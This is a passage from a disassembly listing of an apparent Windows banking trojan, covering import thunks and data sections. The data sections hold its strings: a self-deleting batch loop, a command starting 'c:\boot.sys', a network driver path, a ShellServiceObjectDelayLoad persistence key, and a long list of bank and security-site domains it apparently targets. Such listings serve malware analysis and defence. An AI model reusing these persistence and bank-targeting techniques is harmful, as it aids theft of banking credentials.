; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C898 proc near ; CODE XREF: sub_40B143+237�p
; sub_40B143+775�p
jmp ds:dword_4474B8
sub_40C898 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8A4 proc near ; CODE XREF: sub_40B143+195�p
jmp ds:dword_4474BC
sub_40C8A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8B0 proc near ; CODE XREF: sub_40B143+898�p
jmp ds:dword_4474C0
sub_40C8B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8BC proc near ; CODE XREF: sub_40B01B+112�p
jmp ds:dword_4474C4
sub_40C8BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8C8 proc near ; CODE XREF: sub_40A766+4BD�p
jmp ds:dword_4474D0
sub_40C8C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8D4 proc near ; CODE XREF: sub_40B143+2DB�p
jmp ds:dword_4474D4
sub_40C8D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8E0 proc near ; CODE XREF: sub_40B143+2C2�p
; sub_40B143+2CE�p
jmp ds:dword_4474D8
sub_40C8E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8EC proc near ; CODE XREF: sub_40B143+2FA�p
jmp ds:dword_4474DC
sub_40C8EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8F8 proc near ; CODE XREF: sub_408E89+1CE�p
; sub_408E89+7D8�p
jmp ds:dword_4474E0
sub_40C8F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C904 proc near ; CODE XREF: sub_40518F+36�p
jmp ds:dword_4474EC
sub_40C904 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C910 proc near ; CODE XREF: sub_40518F+9B�p
jmp ds:dword_4474F0
sub_40C910 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C91C proc near ; CODE XREF: sub_4015EB+2E�p
; sub_404098+8�p
jmp ds:dword_4474F4
sub_40C91C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C928 proc near ; CODE XREF: sub_4014BD+7C�p
; sub_4015EB+68�p ...
jmp ds:dword_4474F8
sub_40C928 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C934 proc near ; CODE XREF: sub_4014BD+2A�p
jmp ds:dword_4474FC
sub_40C934 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C940 proc near ; CODE XREF: sub_4014BD+6A�p
jmp ds:dword_447500
sub_40C940 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C94C proc near ; CODE XREF: sub_4015EB+5E�p
; sub_4040AA+27�p
jmp ds:dword_447504
sub_40C94C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C958 proc near ; CODE XREF: sub_4022CC+138�p
jmp ds:dword_447508
sub_40C958 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C964 proc near ; CODE XREF: sub_4022CC+173�p
jmp ds:dword_44750C
sub_40C964 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C970 proc near ; CODE XREF: sub_4022CC+159�p
jmp ds:dword_447510
sub_40C970 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C97C proc near ; CODE XREF: sub_404FEF+24�p
jmp ds:dword_447514
sub_40C97C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C988 proc near ; CODE XREF: sub_404FEF+16D�p
jmp ds:dword_447518
sub_40C988 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C994 proc near ; CODE XREF: sub_404FEF+37�p
jmp ds:dword_44751C
sub_40C994 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9A0 proc near ; CODE XREF: sub_403610+40�p
jmp ds:dword_447528
sub_40C9A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9AC proc near ; CODE XREF: sub_401219+49�p
jmp ds:dword_44752C
sub_40C9AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9B8 proc near ; CODE XREF: sub_406A9A+1D5�p
; sub_406E2B+6C�p ...
jmp ds:dword_447530
sub_40C9B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9C4 proc near ; CODE XREF: sub_4053A1+E5�p
; sub_4053A1+14C�p
jmp ds:dword_447534
sub_40C9C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9D0 proc near ; CODE XREF: sub_409847+D97�p
; sub_409847+DD1�p
jmp ds:dword_447538
sub_40C9D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9DC proc near ; CODE XREF: sub_401219+74�p
; sub_409847+D1D�p ...
jmp ds:dword_44753C
sub_40C9DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9E8 proc near ; CODE XREF: sub_4088D5+116�p
jmp ds:dword_447540
sub_40C9E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9F4 proc near ; CODE XREF: sub_40129C+1A�p
; .text:0040144C�p ...
jmp ds:dword_447544
sub_40C9F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA00 proc near ; CODE XREF: sub_4062CD+71�p
; sub_4062CD+236�p ...
jmp ds:dword_447548
sub_40CA00 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA0C proc near ; CODE XREF: sub_40109A+149�p
jmp ds:dword_44754C
sub_40CA0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA18 proc near ; CODE XREF: sub_40170F:loc_401732�p
; sub_403C5F+50�p ...
jmp ds:dword_447550
sub_40CA18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA24 proc near ; CODE XREF: sub_40109A+102�p
; sub_40109A+11C�p ...
jmp ds:dword_447554
sub_40CA24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA30 proc near ; CODE XREF: sub_4037EF+2E�p
; .text:004038BB�p ...
jmp ds:dword_447558
sub_40CA30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA3C proc near ; CODE XREF: sub_409847+74�p
; sub_40A766+137�p
jmp ds:dword_44755C
sub_40CA3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA48 proc near ; CODE XREF: sub_409847+A25�p
jmp ds:dword_447560
sub_40CA48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA54 proc near ; CODE XREF: sub_403449+5D�p
; sub_4034D8+53�p ...
jmp ds:dword_447564
sub_40CA54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA60 proc near ; CODE XREF: sub_40C434+17�p
jmp ds:dword_447568
sub_40CA60 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA6C proc near ; CODE XREF: sub_4062CD+4B8�p
jmp ds:dword_44756C
sub_40CA6C endp
; ---------------------------------------------------------------------------
align 800h
_text ends
; Section 2. (virtual address 0000D000)
; Virtual size : 0002D428 ( 185384.)
; Section size in file : 0002D428 ( 185384.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_bss segment para public 'DATA' use32
assume cs:_bss
;org 40D000h
dword_40D000 dd 72656B5Ch ; DATA XREF: sub_4083E5+53�w
; sub_4083E5+8E�r ...
aNel32_dll db 'nel32.dll',0
align 10h
db 0
aSCmd_pif db '%s\cmd.pif',0
db 0
db 2 dup(0), 5Ch
aCmd_exeCStartC db 'cmd.exe /C start c:\boot.sys',0
align 10h
dd 3F2h dup(0)
dword_40E008 dd 0 ; DATA XREF: sub_408E89+93E�w
; sub_40B01B+DF�r
dword_40E00C dd 0 ; DATA XREF: sub_401D14+37�w
; sub_401D14+47D�w ...
dword_40E010 dd 40h dup(0) ; DATA XREF: sub_408189+1B9�o
; sub_409847+6DA�o ...
dword_40E110 dd 0 ; DATA XREF: sub_40357C+57�w
; sub_40357C:loc_403606�r
dd 455h dup(0)
dword_40F268 dd 0 ; DATA XREF: sub_401D14+4C�w
; sub_401D14+23D�w ...
dword_40F26C dd 0 ; DATA XREF: sub_401D14:loc_40211A�w
; sub_401D14+412�r ...
dword_40F270 dd 0 ; DATA XREF: sub_406E2B+F72�r
; sub_406E2B+FF8�r ...
byte_40F274 db 0 ; DATA XREF: sub_401D14+14F�w
align 10h
dword_40F280 dd 40h dup(0) ; DATA XREF: sub_401334+3D�o
; sub_40A766+3BC�o ...
dword_40F380 dd 0 ; DATA XREF: sub_4028A6+4F�r
; sub_402A4D+E5�w ...
dd 0FFh dup(0)
dword_40F780 dd 0 ; DATA XREF: sub_40375C+50�w
; sub_40375C+89�r
dd 431h dup(0)
dword_410848 dd 0 ; DATA XREF: sub_408E89+6AD�w
; sub_408E89+816�r ...
align 10h
dword_410850 dd 0 ; DATA XREF: .text:00401B68�w
; .text:loc_401B90�r
dd 457h dup(0)
dword_4119B0 dd 0 ; DATA XREF: sub_402A4D+5D7�w
dd 0FFh dup(0)
dword_411DB0 dd 785C7325h ; DATA XREF: sub_4040FC+52�w
; sub_4040FC:loc_40418A�r
aSlfdlnt_bat db 'slfdlnt.bat',0
dd 0
aSCmd_pif_0 db '%s\cmd.pif',0
align 10h
dd 5C000000h, 2E646D63h, 657865h, 0
aLoop@delSNul@i db ':loop',0Dh,0Ah
db '@del %s>nul',0Dh,0Ah
db '@if exist %s goto loop',0Dh,0Ah
db '@del %s>nul',0Dh,0Ah,0
align 4
dd 73250000h, 20432F20h, 7325h, 3EEh dup(0)
dword_412DE0 dd 0 ; DATA XREF: .text:00402532�w
; .text:loc_402568�r
dd 462h dup(0)
dword_413F6C dd 0 ; DATA XREF: sub_408E89+975�w
; sub_40B01B+F8�r
dword_413F70 dd 0 ; DATA XREF: sub_408E89+40A�w
; sub_408E89+854�r ...
align 8
byte_413F78 db 0 ; DATA XREF: sub_401D14+41A�w
align 10h
byte_413F80 db 0 ; DATA XREF: sub_401D14+6C�w
; sub_401D14+71�r ...
align 4
dword_413F84 dd 0 ; DATA XREF: sub_401D14+5D�w
; sub_401D14+1E7�w ...
align 10h
dword_413F90 dd 40h dup(0) ; DATA XREF: sub_409847+876�o
; sub_409847+969�o ...
dword_414090 dd 0 ; DATA XREF: sub_402A4D+BC�w
; sub_402A4D+D9�r ...
dd 0FFh dup(0)
dword_414490 dd 0 ; DATA XREF: sub_4080E0+58�w
; sub_4080E0+9F�r
dd 45Bh dup(0)
dword_415600 dd 0 ; DATA XREF: .text:0040191C�w
; .text:00401957�r
dword_415604 dd 423h dup(0)
dword_416690 dd 0 ; DATA XREF: sub_4045EF+42�w
; sub_4045EF:loc_404659�r
dd 3EBh dup(0)
dword_417640 dd 0 ; DATA XREF: .text:004021F9�w
; .text:00402232�r
dword_417644 dd 40Bh dup(0)
dword_418670 dd 94h ; DATA XREF: sub_40A766+E2�w
; sub_40A766+EC�o
dd 5, 1, 0A28h
dword_418680 dd 2 ; DATA XREF: sub_409847+A81�r
dd 23h dup(0)
dword_418710 dd 0 ; DATA XREF: sub_405254:loc_4052AC�w
; sub_405254+91�r
dd 3F3h dup(0)
dword_4196E0 dd 0 ; DATA XREF: .text:00401484�w
; .text:004014B3�r
dd 45Eh dup(0)
byte_41A85C db 0 ; DATA XREF: sub_401D14+3DC�w
; sub_401D14+3E1�r
align 10h
dword_41A860 dd 0 ; DATA XREF: sub_401D14+53�w
; sub_401D14+F6�r ...
dword_41A864 dd 0 ; DATA XREF: sub_40B143+27B�r
dword_41A868 dd 0 ; DATA XREF: sub_40223C+5A�w
; sub_4022CC+114�r ...
align 10h
dword_41A870 dd 6972645Ch ; DATA XREF: sub_40129C+52�w
; sub_40129C:loc_40132A�r
aVersNdisrd_sys db 'vers\ndisrd.sys',0
align 8
aEnabledsf db 'enabledsf',0
align 4
dd 73250000h, 2E73255Ch, 657865h, 3FFh dup(0)
dword_41B89C dd 0 ; DATA XREF: sub_40A766+50C�w
; sub_40A766+84C�r ...
dword_41B8A0 dd 0 ; DATA XREF: sub_4068A2+52�w
; sub_4068A2:loc_406924�r
dd 42Ah dup(0)
dword_41C94C dd 0 ; DATA XREF: sub_408E89+12B�w
; sub_408E89+1E8�r
dword_41C950 dd 0 ; DATA XREF: sub_408E89+46�w
; sub_408E89+52�r ...
dword_41C954 dd 0 ; DATA XREF: sub_40223C+45�w
; sub_4024C1+D�r
align 10h
dword_41C960 dd 463Ah ; DATA XREF: sub_4032E7+58�w
; sub_4032E7+92�r
dd 443h dup(0)
dword_41DA70 dd 0 ; DATA XREF: sub_401D14+3E�w
; sub_401D14:loc_401DB1�w ...
dword_41DA74 dd 0 ; DATA XREF: sub_408E89+710�w
; sub_408E89+723�r ...
dword_41DA78 dd 0 ; DATA XREF: sub_408E89+8EE�w
; sub_40B01B+C5�r
dword_41DA7C dd 0 ; DATA XREF: sub_408E89+2B7�w
; sub_408E89+367�r ...
dword_41DA80 dd 0 ; DATA XREF: sub_40223C+76�w
; sub_402465+4C�r
dword_41DA84 dd 400000h ; DATA XREF: sub_408E89+71�r
; sub_408E89+DB�r ...
dword_41DA88 dd 0 ; DATA XREF: sub_401D14+45�w
; sub_401D14+CD�w ...
align 10h
dword_41DA90 dd 3430257Bh ; DATA XREF: sub_403936+5A�w
; sub_403936:loc_4039CC�r
aX04x04x04x04x0 db 'X%04X-%04X-%04X-%04X-%04X%04X%04X}',0
align 4
dd 0
dd 25000000h, 583830h, 2 dup(0)
aSS_dll db '%s\%s.dll',0
align 4
dd 0
dd 4C430000h, 5C444953h, 495C7325h, 6F72506Eh, 72655363h
dd 33726576h, 32h, 0
dd 68540000h, 64616572h, 4D676E69h, 6C65646Fh, 2 dup(0)
dd 61704100h, 656D7472h, 746Eh, 0
db 0
db 2 dup(0), 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayL'
db 'oad',0
align 10h
dd 3C3h dup(0)
dword_41EA7C dd 0 ; DATA XREF: sub_408E89+8B3�w
; sub_40B01B+B1�r
dword_41EA80 dd 40h dup(0) ; DATA XREF: sub_409847+5DE�o
; sub_40A766+387�o ...
byte_41EB80 db 0 ; DATA XREF: sub_401D14+19B�w
align 4
dword_41EB84 dd 0 ; DATA XREF: sub_408E89+B1�w
; sub_408E89+E3�r ...
align 10h
byte_41EB90 db 0 ; DATA XREF: sub_406E2B+199�o
; sub_406E2B+CD4�o ...
byte_41EB91 db 0 ; DATA XREF: sub_406E2B+E7D�r
byte_41EB92 db 0 ; DATA XREF: sub_406E2B+E86�r
byte_41EB93 db 0 ; DATA XREF: sub_406E2B+E8F�r
dd 1828h dup(0)
db 2 dup(0)
word_424C36 dw 0 ; DATA XREF: .data:off_4412E2�o
dword_424C38 dd 27D6h dup(0)
byte_42EB90 db 0 ; DATA XREF: sub_401D14+289�w
; sub_401D14+28E�r
align 4
dword_42EB94 dd 0 ; DATA XREF: sub_406E2B+1C0�w
; .text:0040809F�r ...
align 10h
dword_42EBA0 dd 0 ; DATA XREF: .text:004017BF�w
; .text:loc_4017FC�r
dd 453h dup(0)
dword_42FCF0 dd 0 ; DATA XREF: sub_40223C+86�w
dword_42FCF4 dd 0 ; DATA XREF: sub_40223C+30�w
; sub_4022CC+36�r
dword_42FCF8 dd 0 ; DATA XREF: sub_408E89+194�w
; sub_408E89+20E�r ...
byte_42FCFC db 0 ; DATA XREF: sub_401D14+315�w
; sub_401D14+31F�r ...
align 10h
dword_42FD00 dd 0 ; DATA XREF: .text:004044E1�w
; .text:loc_40451D�r
dd 3FBh dup(0)
dword_430CF0 dd 0 ; DATA XREF: sub_406D88+5A�w
; sub_406D88:loc_406E21�r
dd 402h dup(0)
dword_431CFC dd 0 ; DATA XREF: sub_408E89+493�w
; sub_408E89+836�r ...
dword_431D00 dd 0 ; DATA XREF: sub_408E89+57D�w
; sub_40B143+28B�r ...
dword_431D04 dd 0 ; DATA XREF: sub_408E89+251�w
; sub_408E89+325�r ...
align 10h
dword_431D10 dd 0 ; DATA XREF: .text:00408780�w
; .text:004087B9�r
dd 43Bh dup(0)
aCWindowsSystem db 'C:\WINDOWS\System32',0 ; DATA XREF: sub_403AA3+7F�o
; sub_403C5F+25C�o ...
dd 3Bh dup(0)
byte_432F00 db 0 ; DATA XREF: sub_401334+AA�o
; sub_408189+F1�w ...
align 4
dd 3Fh dup(0)
dword_433000 dd 0 ; DATA XREF: .text:004019FB�w
; .text:loc_401A2C�r
dd 3F8h dup(0)
dword_433FE4 dd 0 ; DATA XREF: sub_408E89+508�w
; sub_408E89+878�r ...
dword_433FE8 dd 0 ; DATA XREF: sub_408E89+7A1�w
; sub_408E89+89B�r
align 10h
dword_433FF0 dd 0 ; DATA XREF: .text:004015A9�w
; .text:004015E1�r
dd 196h dup(0)
dword_43464C dd 27Dh dup(0) ; DATA XREF: .data:off_4464FB�o
dword_435040 dd 0 ; DATA XREF: sub_404F4F+50�w
; sub_404F4F+96�r
dd 437h dup(0)
dword_436120 dd 0 ; DATA XREF: .text:00401CCE�w
; .text:00401D0A�r
dd 41Bh dup(0)
dword_437190 dd 0 ; DATA XREF: .text:004016CA�w
; .text:00401705�r
dd 423h dup(0)
dword_438220 dd 0 ; DATA XREF: .text:00408A57�w
; .text:loc_408A8B�r
dd 441h dup(0)
dword_439328 dd 0 ; DATA XREF: sub_408E89+5F7�w
; sub_40B143+293�r ...
align 10h
byte_439330 db 0 ; DATA XREF: sub_401D14+458�w
align 10h
dword_439340 dd 0 ; DATA XREF: .text:00408862�w
; .text:0040889B�r
dd 439h dup(0)
_bss ends
; Section 3. (virtual address 0003B000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 0003B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 43B000h
dd offset dword_40D000
dd 43A428h, 8000h, 0
dword_43B010 dd 0 ; DATA XREF: sub_40109A+F6�w
; sub_40109A+110�w ...
dword_43B014 dd 12FF74h ; DATA XREF: sub_401219+60�w
dd 0
dword_43B01C dd 0 ; DATA XREF: sub_401219+B�o
dword_43B020 dd 1 ; DATA XREF: sub_401219+44�o
; sub_401219+5A�r
dword_43B024 dd 14B5A0h ; DATA XREF: sub_401219+3F�o
; sub_401219+54�r
dword_43B028 dd 149C48h ; DATA XREF: sub_401219+3A�o
; sub_401219+4E�r
dword_43B02C dd 0 ; DATA XREF: sub_40109A:loc_4011F8�r
; sub_40109A:loc_401208�r
dword_43B030 dd 0 ; DATA XREF: sub_40109A+62�w
dword_43B034 dd 0 ; DATA XREF: sub_40109A+6C�w
; sub_40109A+87�r ...
dword_43B038 dd 0 ; DATA XREF: sub_40109A+74�w
dword_43B03C dd 14h dup(0) ; DATA XREF: sub_40109A+81�o
; sub_40109A+8F�o
dword_43B08C dd 0 ; DATA XREF: sub_40109A+11�w
dword_43B090 dd 0 ; DATA XREF: sub_40109A+16�w
; sub_40109A+32�w
dword_43B094 dd 2 ; DATA XREF: sub_408E89+10D�r
; sub_408E89+1C5�r ...
dword_43B098 dd 0Ch ; DATA XREF: sub_401334+A3�r
; sub_408DEF+5B�r ...
dword_43B09C dd 34h ; DATA XREF: sub_40129C+D�r
; sub_40129C:loc_4012C2�r ...
aKkqhook_28 db 'KKQHOOK_28',0 ; DATA XREF: sub_40A704+19�o
; sub_40A766+51F�o
align 4
dd 372E3D00h, 0
dword_43B0B4 dd 0 ; DATA XREF: sub_409847+144�r
; sub_409847+17C�r ...
dword_43B0B8 dd 46h ; DATA XREF: sub_409847+D9C�r
; sub_409847+DF7�r ...
off_43B0BC dd offset aSiliconfirewar ; DATA XREF: sub_409847+14A�r
; sub_409847+182�r
; "siliconfireware.ru"
dd offset aChechenpress_i ; "chechenpress.info"
dd offset aProdexteam_net ; "prodexteam.net"
dd offset aProdexteam_n_0 ; "prodexteam.net/main.htm"
dd offset aWww_cbr_ru ; "www.cbr.ru"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aProdexteam_n_1 ; "prodexteam.netcrutop.nu"
dd offset aNew_egg_com ; "new.egg.com"
dd offset aWww_baltbank_r ; "www.baltbank.ru"
dd offset aWelcome3_smile ; "welcome3.smile.co.uk"
dd offset aOlb2_nationet_ ; "olb2.nationet.com"
dd offset aWww_bbin_ru ; "www.bbin.ru"
dd offset aMasterX_com ; "master-x.com"
dd offset aEbookfinaltras ; "ebookfinaltrash.ru"
dd offset aWww_masterbank ; "www.masterbank.ru"
dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php"
dd offset aWww_bmo_com ; "www.bmo.com"
dd offset aWww_bankofmadu ; "www.bankofmadura.com"
dd offset aWww_cibc_com ; "www.cibc.com"
dd offset aWww_vtb_ru ; "www.vtb.ru"
dd offset aWww_cwbank_com ; "www.cwbank.com"
dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru"
dd offset aAlfabank_ru ; "alfabank.ru"
dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/"
dd offset aWww_mmbank_ru ; "www.mmbank.ru"
dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php"
dd offset aWww_uniastrum_ ; "www.uniastrum.ru"
dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aAsmworm_com ; "asmworm.com"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru"
dd offset aWww_worldbank_ ; "www.worldbank.org/index.php"
dd offset aWww_candidatev ; "www.candidateverifier.com/index.php"
dd offset aWww_sbrf_ru ; "www.sbrf.ru"
dd offset aPizdabolInc_ru ; "pizdabol-inc.ru"
dd offset aWww_bankofindi ; "www.bankofindia.com"
dd offset aWww_icbank_ru ; "www.icbank.ru"
dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."...
dd offset aWww_spyinstruc ; "www.spyinstructors.com"
dd offset aWww_kmb_ru ; "www.kmb.ru"
dd offset aWww_netmagiste ; "www.netmagister.com"
dd offset aKavkazcenter_c ; "kavkazcenter.com/russ"
dd offset aWww_absolutban ; "www.absolutbank.ru"
dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk"
dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk"
dd offset aWww_allahabadb ; "www.allahabadbank.com"
dd offset aMasterX_comFor ; "master-x.com/forum/"
dd offset aWww_rbc_com ; "www.rbc.com"
dd offset aWww_ovk_ru ; "www.ovk.ru"
dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php"
dd offset aProrat_net ; "prorat.net"
dd offset aYambo_biz ; "yambo.biz"
dd offset aKidosBank_ru ; "kidos-bank.ru"
dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"...
dd offset aBarclays_com ; "barclays.com"
dd offset aTotallyfreeban ; "totallyfreebanking.com"
dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php"
dd offset a53bank_com ; "53bank.com"
dd offset aWww_uralsib_ru ; "www.uralsib.ru"
dd offset aGrepwareFacili ; "grepware-facility.ru"
dd offset aWww_b2bTrust_c ; "www.b2b-trust.com"
dd offset aGutabank_ru ; "gutabank.ru"
dd offset aOpenbank_com ; "openbank.com"
dd offset aSeclab_ru ; "seclab.ru"
dd offset aTatNeftbank_ru ; "tat-neftbank.ru"
dd offset aSecuritylab_ru ; "securitylab.ru"
dd offset aRoyalbank_com ; "royalbank.com"
dd offset aFethard_biz ; "fethard.biz"
dd offset aWww_mdmbank_ru ; "www.mdmbank.ru"
dd offset aGronxplanets_r ; "gronxplanets.ru"
dd offset aChevychasebank ; "chevychasebank.com"
db 24h, 6Ch, 0
aSoftwareMicr_0 db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_409847+599�o
; sub_409847+62D�o ...
aC9 db 'C9',27h,'/%',0
aOfstkkq db 'ofstkkq',0 ; DATA XREF: sub_409847+594�o
; sub_409847+628�o
aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_409847+6A3�o
; sub_409847+84D�o
align 4
dword_43B214 dd 0 ; DATA XREF: sub_408189+18C�w
; sub_40B143:loc_40B2FA�r ...
dword_43B218 dd 0 ; DATA XREF: sub_40B143+7F�r
; sub_40B143+B3�r ...
aVk db ' vK%;',0 ; DATA XREF: sub_401334+1B�o
aByxy db 'Byxy',0 ; DATA XREF: sub_401334+E1�o
align 4
dword_43B228 dd 3Bh ; DATA XREF: sub_401D14+1A�w
; sub_401D14+B7�w ...
dd 6, 0Eh
dword_43B234 dd 0 ; DATA XREF: .text:0040143F�r
; .text:loc_401458�r ...
aMI5 db 'm i5',0 ; DATA XREF: sub_4014BD+C�o
a4Ec db '4%ec',0 ; DATA XREF: sub_4014BD+34�o
aXuT db 'xU t',0 ; DATA XREF: sub_4014BD+4C�o
align 4
dd 4, 0Dh
dword_43B250 dd 0 ; DATA XREF: .text:00401564�r
; .text:loc_40157D�r ...
aDGu db 'D GU',0 ; DATA XREF: sub_4015EB+40�o
align 4
dd 6, 10h
dword_43B264 dd 0 ; DATA XREF: .text:00401688�r
; .text:loc_4016A8�r ...
dword_43B268 dd 263Ah, 5, 0Fh ; DATA XREF: sub_40170F+12�o
dword_43B274 dd 0 ; DATA XREF: .text:0040177D�r
; .text:loc_40179D�r ...
dword_43B278 dd 263Ah, 6, 10h ; DATA XREF: sub_401806+18�o
dword_43B284 dd 0 ; DATA XREF: .text:004018DA�r
; .text:loc_4018FA�r ...
dword_43B288 dd 7F3E4546h, 7961h, 8, 12h ; DATA XREF: .text:00401971�o
dword_43B298 dd 0 ; DATA XREF: .text:004019BD�r
; .text:loc_4019D6�r ...
byte_43B29C db 0 ; DATA XREF: sub_401A36+C�o
byte_43B29D db 0 ; DATA XREF: sub_401A36+5D�o
byte_43B29E db 0 ; DATA XREF: sub_401A36+BA�o
dword_43B29F dd 3C2053h ; DATA XREF: sub_401A36+CB�r
align 4
dd 3, 0Eh
dword_43B2AC dd 0 ; DATA XREF: .text:00401B26�r
; .text:loc_401B46�r ...
aRrQa db 'rr/+Q',0 ; DATA XREF: sub_401B9A+29�o
align 4
dd 5, 12h
dword_43B2C0 dd 0 ; DATA XREF: .text:00401C90�r
; .text:loc_401CA9�r ...
aL2r6_ db 'l2r-6;.',0 ; DATA XREF: sub_401D14+95�o
byte_43B2CC db 0 ; DATA XREF: sub_401D14+A7�o
aF50z db 'F 5 0z',0 ; DATA XREF: sub_401D14+437�o
off_43B2D4 dd offset loc_401DB1 ; DATA XREF: sub_401D14+8B�r
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_40200C
dd offset loc_401F91
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
